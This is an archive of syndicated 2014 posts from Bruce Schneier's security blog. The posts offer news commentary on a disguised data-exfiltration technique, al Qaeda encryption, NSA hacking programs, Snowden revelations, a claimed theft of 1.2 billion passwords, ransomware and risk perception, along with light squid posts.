Author Archive

Schneier on Security: Friday Squid Blogging: Squid Boats Illuminate Bangkok from Space

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Really:

To attract the phytoplankton, fishermen suspend green lights from their boats to illuminate the sea. When the squid chase after their dinner, they’re drawn closer to the surface, making it easier for fishermen to net them. Squid boats often carry up to 100 of these green lamps, which generate hundreds of kilowatts of electricity–making them visible, it appears, even from space.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Schneier on Security: Chapter 137 of My Surreal Life

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Someone wrote Sherlock-Schneier fan fiction. Not slash, thank heavens. (And no, that’s not an invitation.)

Schneier on Security: The <i>Onion</i> on Passwords

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Funny.

Schneier on Security: Disguising Exfiltrated Data

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s an interesting article on a data exfiltration technique.

What was unique about the attackers was how they disguised traffic between the malware and command-and-control servers using Google Developers and the public Domain Name System (DNS) service of Hurricane Electric, based in Fremont, Calif.

In both cases, the services were used as a kind of switching station to redirect traffic that appeared to be headed toward legitimate domains, such as adobe.com, update.adobe.com, and outlook.com.

[...]

The malware disguised its traffic by including forged HTTP headers of legitimate domains. FireEye identified 21 legitimate domain names used by the attackers.

In addition, the attackers signed the Kaba malware with a legitimate certificate from a group listed as the “Police Mutual Aid Association” and with an expired certificate from an organization called “MOCOMSYS INC.”

In the case of Google Developers, the attackers used the service to host code that decoded the malware traffic to determine the IP address of the real destination and edirect the traffic to that location.

Google Developers, formerly called Google Code, is the search engine’s website for software development tools, APIs, and documentation on working with Google developer products. Developers can also use the site to share code.

With Hurricane Electric, the attacker took advantage of the fact that its domain name servers were configured, so anyone could register for a free account with the company’s hosted DNS service.

The service allowed anyone to register a DNS zone, which is a distinct, contiguous portion of the domain name space in the DNS. The registrant could then create A records for the zone and point them to any IP address.

Honestly, this looks like a government exfiltration technique, although it could be evidence that the criminals are getting even more sophisticated.

Schneier on Security: The Security of al Qaeda Encryption Software

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

The web intelligence firm Recorded Future has posted two stories about how al Qaeda is using new encryption software in response to the Snowden disclosures. NPR picked up the story a week later.

Former NSA Chief Council Stewart Baker uses this as evidence that Snowden has harmed America. Glenn Greenwald calls this “CIA talking points” and shows that al Qaeda was using encryption well before Snowden. Both quote me heavily, Baker casting me as somehow disingenuous on this topic.

Baker is conflating my stating of two cryptography truisms. The first is that cryptography is hard, and you’re much better off using well-tested public algorithms than trying to roll your own. The second is that cryptographic implementation is hard, and you’re much better off using well-tested open-source encryption software than you are trying to roll your own. Admittedly, they’re very similar, and sometimes I’m not as precise as I should be when talking to reporters.

This is what I wrote in May:

I think this will help US intelligence efforts. Cryptography is hard, and the odds that a home-brew encryption product is better than a well-studied open-source tool is slight. Last fall, Matt Blaze said to me that he thought that the Snowden documents will usher in a new dark age of cryptography, as people abandon good algorithms and software for snake oil of their own devising. My guess is that this an example of that.

Note the phrase “good algorithms and software.” My intention was to invoke both truisms in the same sentence. That paragraph is true if al Qaeda is rolling their own encryption algorithms, as Recorded Future reported in May. And it remains true if al Qaeda is using algorithms like my own Twofish and rolling their own software, as Recorded Future reported earlier this month. Everything we know about how the NSA breaks cryptography is that they attack the implementations far more successfully than the algorithms.

My guess is that in this case they don’t even bother with the encryption software; they just attack the users’ computers. There’s nothing that screams “hack me” more than using specially designed al Qaeda encryption software. There’s probably a QUANTUMINSERT attack and FOXACID exploit already set on automatic fire.

I don’t want to get into an argument about whether al Qaeda is altering its security in response to the Snowden documents. Its members would be idiots if they did not, but it’s also clear that they were designing their own cryptographic software long before Snowden. My guess is that the smart ones are using public tools like OTR and PGP and the paranoid dumb ones are using their own stuff, and that the split was the same both pre- and post-Snowden.

Schneier on Security: US Air Force is Focusing on Cyber Deception

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

The US Air Force is focusing on cyber deception next year:

Background: Deception is a deliberate act to conceal activity on our networks, create uncertainty and confusion against the adversary’s efforts to establish situational awareness and to influence and misdirect adversary perceptions and decision processes. Military deception is defined as “those actions executed to deliberately mislead adversary decision makers as to friendly military capabilities, intentions, and operations, thereby causing the adversary to take specific actions (or inactions) that will contribute to the accomplishment of the friendly mission.” Military forces have historically used techniques such as camouflage, feints, chaff, jammers, fake equipment, false messages or traffic to alter an enemy’s perception of reality. Modern day military planners need a capability that goes beyond the current state-of-the-art in cyber deception to provide a system or systems that can be employed by a commander when needed to enable deception to be inserted into defensive cyber operations.

Relevance and realism are the grand technical challenges to cyber deception. The application of the proposed technology must be relevant to operational and support systems within the DoD. The DoD operates within a highly standardized environment. Any technology that significantly disrupts or increases the cost to the standard of practice will not be adopted. If the technology is adopted, the defense system must appear legitimate to the adversary trying to exploit it.

Objective: To provide cyber-deception capabilities that could be employed by commanders to provide false information, confuse, delay, or otherwise impede cyber attackers to the benefit of friendly forces. Deception mechanisms must be incorporated in such a way that they are transparent to authorized users, and must introduce minimal functional and performance impacts, in order to disrupt our adversaries and not ourselves. As such, proposed techniques must consider how challenges relating to transparency and impact will be addressed. The security of such mechanisms is also paramount, so that their power is not co-opted by attackers against us for their own purposes. These techniques are intended to be employed for defensive purposes only on networks and systems controlled by the DoD.

Advanced techniques are needed with a focus on introducing varying deception dynamics in network protocols and services which can severely impede, confound, and degrade an attacker’s methods of exploitation and attack, thereby increasing the costs and limiting the benefits gained from the attack. The emphasis is on techniques that delay the attacker in the reconnaissance through weaponization stages of an attack and also aid defenses by forcing an attacker to move and act in a more observable manner. Techniques across the host and network layers or a hybrid thereof are of interest in order to provide AF cyber operations with effective, flexible, and rapid deployment options.

More discussion here.

Schneier on Security: QUANTUM Technology Sold by Cyberweapons Arms Manufacturers

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Last October, I broke the story about the NSA’s top secret program to inject packets into the Internet backbone: QUANTUM. Specifically, I wrote about how QUANTUMINSERT injects packets into existing Internet connections to redirect a user to an NSA web server codenamed FOXACID to infect the user’s computer. Since then, we’ve learned a lot more about how QUANTUM works, and general details of many other QUANTUM programs.

These techniques make use of the NSA’s privileged position on the Internet backbone. It has TURMOIL computers directly monitoring the Internet infrastructure at providers in the US and around the world, and a system called TURBINE that allows it to perform real-time packet injection into the backbone. Still, there’s nothing about QUANTUM that anyone else with similar access can’t do. There’s a hacker tool called AirPwn that basically performs a QUANTUMINSERT attack on computers on a wireless network.

A new report from Citizen Lab shows that cyberweapons arms manufacturers are selling this type of technology to governments around the world: the US DoD contractor CloudShield Technologies, Italy’s Hacking Team, and Germany’s and the UK’s Gamma International. These programs intercept web connections to sites like Microsoft and Google — YouTube is specially mentioned — and inject malware into users’ computers.

Turkmenistan paid a Swiss company, Dreamlab Technologies — somehow related to the cyberweapons arms manufacturer Gamma International — just under $1M for this capability. Dreamlab also installed the software in Oman. We don’t know what other countries have this capability, but the companies here routinely sell hacking software to totalitarian countries around the world.

There’s some more information in this Washington Post article, and this essay on the Intercept.

In talking about the NSA’s capabilities, I have repeatedly said that today’s secret NSA programs are tomorrow’s PhD dissertations and the next day’s hacker tools. This is exactly what we’re seeing here. By developing these technologies instead of helping defend against them, the NSA — and GCHQ and CESG — are contributing to the ongoing insecurity of the Internet.

Related: here is an open letter from Citizen Lab’s Ron Diebert to Hacking Team about the nature of Citizen Lab’s research and the misleading defense of Hacking Team’s products.

Schneier on Security: NSA/GCHQ/CES Infecting Innocent Computers Worldwide

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a new story on the c’t magazin website about a 5-Eyes program to infect computers around the world for use as launching pads for attacks. These are not target computers; these are innocent third parties.

The article actually talks about several government programs. HACIENDA is a GCHQ program to port-scan entire countries, looking for vulnerable computers to attack. According to the undated GCHQ slide, they’ve completed port scans of 27 different countries and are prepared to do more.

The point of this is to create ORBs, or Operational Relay Boxes. Basically, these are computers that sit between the attacker and the target, and are designed to obscure the true origins of an attack. Slides from the Canadian CSE talk about how this process is being automated: “2-3 times/year, 1 day focused effort to acquire as many new ORBs as possible in as many non 5-Eyes countries as possible.” They’ve automated this process into something codenamed LANDMARK, and together with a knowledge engine codenamed OLYMPIA, 24 people were able to identify “a list of 3000+ potential ORBs” in 5-8 hours. The presentation does not go on to say whether all of those computers were actually infected.

Slides from the UK’s GCHQ also talk about ORB detection, as part of a program called MUGSHOT. It, too, is happy with the automatic process: “Initial ten fold increase in Orb identification rate over manual process.” There are also NSA slides that talk about the hacking process, but there’s not much new in them.

The slides never say how many of the “potential ORBs” CESG discovers or the computers that register positive in GCHQ’s “Orb identification” are actually infected, but they’re all stored in a database for future use. The Canadian slides talk about how some of that information was shared with the NSA.

Increasingly, innocent computers and networks are becoming collateral damage, as countries use the Internet to conduct espionage and attacks against each other. This is an example of that. Not only to these intelligence services want an insecure Internet so they can attack each other, they want an insecure Internet so they can use innocent third-parties to help facilitate their attacks.

The story contains formerly TOP SECRET documents from the US, UK, and Canada. Note that Snowden is not mentioned at all in this story. Usually, if the documents the story is based on come from Snowden, the reporters say that. In this case, the reporters have said nothing about where the documents come from. I don’t know if this is an omission — these documents sure look like the sorts of things that come from the Snowden archive — or if there is yet another leaker.

Schneier on Security: NSA/GCHQ/CESC Infecting Innocent Computers Worldwide

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a new story on the c’t magazin website about a 5-Eyes program to infect computers around the world for use as launching pads for attacks. These are not target computers; these are innocent third parties.

The article actually talks about several government programs. HACIENDA is a GCHQ program to port-scan entire countries, looking for vulnerable computers to attack. According to the undated GCHQ slide, they’ve completed port scans of 27 different countries and are prepared to do more.

The point of this is to create ORBs, or Operational Relay Boxes. Basically, these are computers that sit between the attacker and the target, and are designed to obscure the true origins of an attack. Slides from the Canadian CESG talk about how this process is being automated: “2-3 times/year, 1 day focused effort to acquire as many new ORBs as possible in as many non 5-Eyes countries as possible.” They’ve automated this process into something codenamed LANDMARK, and together with a knowledge engine codenamed OLYMPIA, 24 people were able to identify “a list of 3000+ potential ORBs” in 5-8 hours. The presentation does not go on to say whether all of those computers were actually infected.

Slides from the UK’s GCHQ also talk about ORB detection, as part of a program called MUGSHOT. It, too, is happy with the automatic process: “Initial ten fold increase in Orb identification rate over manual process.” There are also NSA slides that talk about the hacking process, but there’s not much new in them.

The slides never say how many of the “potential ORBs” CESG discovers or the computers that register positive in GCHQ’s “Orb identification” are actually infected, but they’re all stored in a database for future use. The Canadian slides talk about how some of that information was shared with the NSA.

Increasingly, innocent computers and networks are becoming collateral damage, as countries use the Internet to conduct espionage and attacks against each other. This is an example of that. Not only to these intelligence services want an insecure Internet so they can attack each other, they want an insecure Internet so they can use innocent third-parties to help facilitate their attacks.

The story contains formerly TOP SECRET documents from the US, UK, and Canada. Note that Snowden is not mentioned at all in this story. Usually, if the documents the story is based on come from Snowden, the reporters say that. In this case, the reporters have said nothing about where the documents come from. I don’t know if this is an omission — these documents sure look like the sorts of things that come from the Snowden archive — or if there is yet another leaker.

Schneier on Security: NSA/GCHQ/CSEC Infecting Innocent Computers Worldwide

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a new story on the c’t magazin website about a 5-Eyes program to infect computers around the world for use as launching pads for attacks. These are not target computers; these are innocent third parties.

The article actually talks about several government programs. HACIENDA is a GCHQ program to port-scan entire countries, looking for vulnerable computers to attack. According to the GCHQ slide from 2009, they’ve completed port scans of 27 different countries and are prepared to do more.

The point of this is to create ORBs, or Operational Relay Boxes. Basically, these are computers that sit between the attacker and the target, and are designed to obscure the true origins of an attack. Slides from the Canadian CSEC talk about how this process is being automated: “2-3 times/year, 1 day focused effort to acquire as many new ORBs as possible in as many non 5-Eyes countries as possible.” They’ve automated this process into something codenamed LANDMARK, and together with a knowledge engine codenamed OLYMPIA, 24 people were able to identify “a list of 3000+ potential ORBs” in 5-8 hours. The presentation does not go on to say whether all of those computers were actually infected.

Slides from the UK’s GCHQ also talk about ORB detection, as part of a program called MUGSHOT. It, too, is happy with the automatic process: “Initial ten fold increase in Orb identification rate over manual process.” There are also NSA slides that talk about the hacking process, but there’s not much new in them.

The slides never say how many of the “potential ORBs” CESG discovers or the computers that register positive in GCHQ’s “Orb identification” are actually infected, but they’re all stored in a database for future use. The Canadian slides talk about how some of that information was shared with the NSA.

Increasingly, innocent computers and networks are becoming collateral damage, as countries use the Internet to conduct espionage and attacks against each other. This is an example of that. Not only to these intelligence services want an insecure Internet so they can attack each other, they want an insecure Internet so they can use innocent third-parties to help facilitate their attacks.

The story contains formerly TOP SECRET documents from the US, UK, and Canada. Note that Snowden is not mentioned at all in this story. Usually, if the documents the story is based on come from Snowden, the reporters say that. In this case, the reporters have said nothing about where the documents come from. I don’t know if this is an omission — these documents sure look like the sorts of things that come from the Snowden archive — or if there is yet another leaker.

Schneier on Security: Friday Squid Blogging: Te Papa Museum Gets a Second Colossal Squid

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

That’s two more than I have. They’re hoping it’s a male.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Schneier on Security: Reverse-Engineering NSA Malware

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Interesting articles reverse-engineering DEITYBOUNCE and BULLDOZER.

Schneier on Security: New Snowden Interview in Wired

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a new article on Edward Snowden in Wired. It’s written by longtime NSA watcher James Bamford, who interviewed Snowden is Moscow.

There’s lots of interesting stuff in the article, but I want to highlight two new revelations. One is that the NSA was responsible for a 2012 Internet blackout in Syria:

One day an intelligence officer told him that TAO­ — a division of NSA hackers­ — had attempted in 2012 to remotely install an exploit in one of the core routers at a major Internet service provider in Syria, which was in the midst of a prolonged civil war. This would have given the NSA access to email and other Internet traffic from much of the country. But something went wrong, and the router was bricked instead — rendered totally inoperable. The failure of this router caused Syria to suddenly lose all connection to the Internet — although the public didn’t know that the US government was responsible….

Inside the TAO operations center, the panicked government hackers had what Snowden calls an “oh shit” moment. They raced to remotely repair the router, desperate to cover their tracks and prevent the Syrians from discovering the sophisticated infiltration software used to access the network. But because the router was bricked, they were powerless to fix the problem.

Fortunately for the NSA, the Syrians were apparently more focused on restoring the nation’s Internet than on tracking down the cause of the outage. Back at TAO’s operations center, the tension was broken with a joke that contained more than a little truth: “If we get caught, we can always point the finger at Israel.”

Other
http://www.nationaljournal.com/tech/snowden-the-nsa-caused-a-massive-internet-blackout-in-syria-20140813″>articles on Syria.

The other is something called MONSTERMIND, which is an automatic strike-back system for cyberattacks.

The program, disclosed here for the first time, would automate the process of hunting for the beginnings of a foreign cyberattack. Software would constantly be on the lookout for traffic patterns indicating known or suspected attacks. When it detected an attack, MonsterMind would automatically block it from entering the country — a “kill” in cyber terminology.

Programs like this had existed for decades, but MonsterMind software would add a unique new capability: Instead of simply detecting and killing the malware at the point of entry, MonsterMind would automatically fire back, with no human involvement.

A bunch more articles and stories on MONSTERMIND.

And there’s this 2011 photo of Snowden and former NSA Director Michael Hayden.

Schneier on Security: Security as Interface Guarantees

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

This is a smart and interesting blog post:

I prefer to think of security as a class of interface guarantee. In particular, security guarantees are a kind of correctness guarantee. At every interface of every kind ­ user interface, programming language syntax and semantics, in-process APIs, kernel APIs, RPC and network protocols, ceremonies ­– explicit and implicit design guarantees (promises, contracts) are in place, and determine the degree of “security” (however defined) the system can possibly achieve.

Design guarantees might or might not actually hold in the implementation ­– software tends to have bugs, after all. Callers and callees can sometimes (but not always) defend themselves against untrustworthy callees and callers (respectively) in various ways that depend on the circumstances and on the nature of caller and callee. In this sense an interface is an attack surface –­ but properly constructed, it can also be a defense surface.

[...]

But also it’s an attempt to re-frame security engineering in a way that allows us to imagine more and better solutions to security problems. For example, when you frame your interface as an attack surface, you find yourself ever-so-slightly in a panic mode, and focus on how to make the surface as small as possible. Inevitably, this tends to lead to cat-and-mouseism and poor usability, seeming to reinforce the false dichotomy. If the panic is acute, it can even lead to nonsensical and undefendable interfaces, and a proliferation of false boundaries (as we saw with Windows UAC).

If instead we frame an interface as a defense surface, we are in a mindset that allows us to treat the interface as a shield: built for defense, testable, tested, covering the body; but also light-weight enough to carry and use effectively. It might seem like a semantic game; but in my experience, thinking of a boundary as a place to build a point of strength rather than thinking of it as something that must inevitably fall to attack leads to solutions that in fact withstand attack better while also functioning better for friendly callers.

I also liked the link at the end.

Schneier on Security: Automatic Scanning for Highly Stressed Individuals

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

This borders on ridiculous:

Chinese scientists are developing a mini-camera to scan crowds for highly stressed individuals, offering law-enforcement officers a potential tool to spot would-be suicide bombers.

[...]

“They all looked and behaved as ordinary people but their level of mental stress must have been extremely high before they launched their attacks. Our technology can detect such people, so law enforcement officers can take precautions and prevent these tragedies,” Chen said.

Officers looking through the device at a crowd would see a mental “stress bar” above each person’s head, and the suspects highlighted with a red face.

The researchers said they were able to use the technology to tell the difference between high-blood oxygen levels produced by stress rather than just physical exertion.

I’m not optimistic about this technology.

Schneier on Security: Irrational Fear of Risks Against Our Children

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a horrible story of a South Carolina mother arrested for letting her 9-year-old daughter play alone at a park while she was at work. The article linked to another article about a woman convicted of “contributing to the delinquency of a minor” for leaving her 4-year-old son in the car for a few minutes. That article contains some excellent commentary by the very sensible Free Range Kids blogger Lenore Skenazy:

“Listen,” she said at one point. “Let’s put aside for the moment that by far, the most dangerous thing you did to your child that day was put him in a car and drive someplace with him. About 300 children are injured in traffic accidents every day — and about two die. That’s a real risk. So if you truly wanted to protect your kid, you’d never drive anywhere with him. But let’s put that aside. So you take him, and you get to the store where you need to run in for a minute and you’re faced with a decision. Now, people will say you committed a crime because you put your kid ‘at risk.’ But the truth is, there’s some risk to either decision you make.” She stopped at this point to emphasize, as she does in much of her analysis, how shockingly rare the abduction or injury of children in non-moving, non-overheated vehicles really is. For example, she insists that statistically speaking, it would likely take 750,000 years for a child left alone in a public space to be snatched by a stranger. “So there is some risk to leaving your kid in a car,” she argues. It might not be statistically meaningful but it’s not nonexistent. The problem is,”she goes on, “there’s some risk to every choice you make. So, say you take the kid inside with you. There’s some risk you’ll both be hit by a crazy driver in the parking lot. There’s some risk someone in the store will go on a shooting spree and shoot your kid. There’s some risk he’ll slip on the ice on the sidewalk outside the store and fracture his skull. There’s some risk no matter what you do. So why is one choice illegal and one is OK? Could it be because the one choice inconveniences you, makes your life a little harder, makes parenting a little harder, gives you a little less time or energy than you would have otherwise had?”

Later on in the conversation, Skenazy boils it down to this. “There’s been this huge cultural shift. We now live in a society where most people believe a child can not be out of your sight for one second, where people think children need constant, total adult supervision. This shift is not rooted in fact. It’s not rooted in any true change. It’s imaginary. It’s rooted in irrational fear.”

Skenazy has some choice words about the South Carolina story as well:

But, “What if a man would’ve come and snatched her?” said a woman interviewed by the TV station.

To which I must ask: In broad daylight? In a crowded park? Just because something happened on Law & Order doesn’t mean it’s happening all the time in real life. Make “what if?” thinking the basis for an arrest and the cops can collar anyone. “You let your son play in the front yard? What if a man drove up and kidnapped him?” “You let your daughter sleep in her own room? What if a man climbed through the window?” etc.

These fears pop into our brains so easily, they seem almost real. But they’re not. Our crime rate today is back to what it was when gas was 29 cents a gallon, according to The Christian Science Monitor. It may feel like kids are in constant danger, but they are as safe (if not safer) than we were when our parents let us enjoy the summer outside, on our own, without fear of being arrested.

Yes.

Schneier on Security: Friday Squid Blogging: Squid Proteins and the Brain-Computer Interface

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a protein in squid that might be useful in getting biological circuits to talk to computer circuits.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Schneier on Security: Eavesdropping by Visual Vibrations

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Researchers are able to recover sound through soundproof glass by recording the vibrations of a plastic bag.

Researchers at MIT, Microsoft, and Adobe have developed an algorithm that can reconstruct an audio signal by analyzing minute vibrations of objects depicted in video. In one set of experiments, they were able to recover intelligible speech from the vibrations of a potato-chip bag photographed from 15 feet away through soundproof glass.

In other experiments, they extracted useful audio signals from videos of aluminum foil, the surface of a glass of water, and even the leaves of a potted plant.

This isn’t a new idea. I remember military security policies requiring people to close the window blinds to prevent someone from shining a laser on the window and recovering the sound from the vibrations. But both the camera and processing technologies are getting better.

News story.

Schneier on Security: Social Engineering a Telemarketer

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Okay, this is funny.

Schneier on Security: The US Intelligence Community has a <em>Third</em> Leaker

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Ever since The Intercept published this story about the US government’s Terrorist Screening Database, the press has been writing about a “second leaker”:

The Intercept article focuses on the growth in U.S. government databases of known or suspected terrorist names during the Obama administration.

The article cites documents prepared by the National Counterterrorism Center dated August 2013, which is after Snowden left the United States to avoid criminal charges.

Greenwald has suggested there was another leaker. In July, he said on Twitter “it seems clear at this point” that there was another.

Everyone’s miscounting. This is the third leaker:

  • Leaker #1: Edward Snowden.

  • Leaker #2: The person that is passing secrets to Jake Appelbaum, Laura Poitras and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. I have also heard privately that the NSA knows that this is a second leaker.
  • Leaker #3: This new leaker, with access to a different stream of information (the NTSC is not the NSA), who The Intercept calls “a source in the intelligence community.”

Harvard Law School professor Yochai Benkler has written an excellent law-review article on the need for a whistleblower defense. And there’s this excellent article by David Pozen on why government leaks are, in general, a good thing.

Schneier on Security: Over a Billion Passwords Stolen?

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

I’ve been doing way too many media interviews over this weird New York Times story that a Russian criminal gang has stolen over 1.2 billion passwords.

As expected, the hype is pretty high over this. But from the beginning, the story didn’t make sense to me. There are obvious details missing: are the passwords in plaintext or encrypted, what sites are they for, how did they end up with a single criminal gang? The Milwaukee company that pushed this story, Hold Security, isn’t a company that I had ever heard of before. (I was with Howard Schmidt when I first heard this story. He lives in Wisconsin, and he had never heard of the company before either.) The New York Times writes that “a security expert not affiliated with Hold Security analyzed the database of stolen credentials and confirmed it was authentic,” but we’re not given any details. This felt more like a PR story from the company than anything real.

Yesterday, Forbes wrote that Hold Security is charging people $120 to tell them if they’re in the stolen-password database:

“In addition to continuous monitoring, we will also check to see if your company has been a victim of the latest CyberVor breach,” says the site’s description of the service using its pet name for the most recent breach. “The service starts from as low as 120$/month and comes with a 2-week money back guarantee, unless we provide any data right away.”

Shortly after Wall Street Journal reporter Danny Yadron linked to the page on Twitter and asked questions about it, the firm replaced the description of the service with a “coming soon” message.

Holden says by email that the service will actually be $10/month and $120/year. “We are charging this symbolical fee to recover our expense to verify the domain or website ownership,” he says by email. “While we do not anticipate any fraud, we need to be cognizant of its potential. The other thing to consider, the cost that our company must undertake to proactively reach out to a company to identify the right individual(s) to inform of a breach, prove to them that we are the ‘good guys’. Believe it or not, it is a hard and often thankless task.”

This story is getting squrrelier and squrrelier. Yes, security companies love to hype the threat to sell their products and services. But this goes further: single-handedly trying to create a panic, and then profiting off that panic.

I don’t know how much of this story is true, but what I was saying to reporters over the past two days is that it’s evidence of how secure the Internet actually is. We’re not seeing massive fraud or theft. We’re not seeing massive account hijacking. A gang of Russian hackers has 1.2 billion passwords — they’ve probably had most of them for a year or more — and everything is still working normally. This sort of thing is pretty much universally true. You probably have a credit card in your wallet right now whose number has been stolen. There are zero-day vulnerabilities being discovered right now that can be used to hack your computer. Security is terrible everywhere, and it it’s all okay. This is a weird paradox that we’re used to by now.

Oh, and if you want to change your passwords, here’s my advice.

EDITED TO ADD (8/7): Brian Krebs vouches for Hold Security. On the other hand, they had no web presence until this story hit. Despite Krebs, I’m skeptical.

EDITED TO ADD (8/7): Here’s an article about Hold Security from February with suspiciously similar numbers.

Schneier on Security: Ubiquitous Surveillance in Singapore

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Good essay.

Schneier on Security: SynoLocker Ransomware Demands Bitcoins

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Network-attached storage devices made by Synology are being attacked, and their data encrypted, by ransomware that demands $350 in bitcoins (payable anonymously via Tor) for the decryption key. As of this moment, there’s no patch.

Schneier on Security: Former NSA Director Patenting Computer Security Techniques

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Former NSA Director Keith Alexander is patenting a variety of techniques to protect computer networks. We’re supposed to believe that he developed these on his own time and they have nothing to do with the work he did at the NSA, except for the parts where they obviously did and therefore are worth $1 million per month for companies to license.

No, nothing fishy here.

Schneier on Security: Friday Squid Blogging: Squid Nebula

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

A nebula that looks like a squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.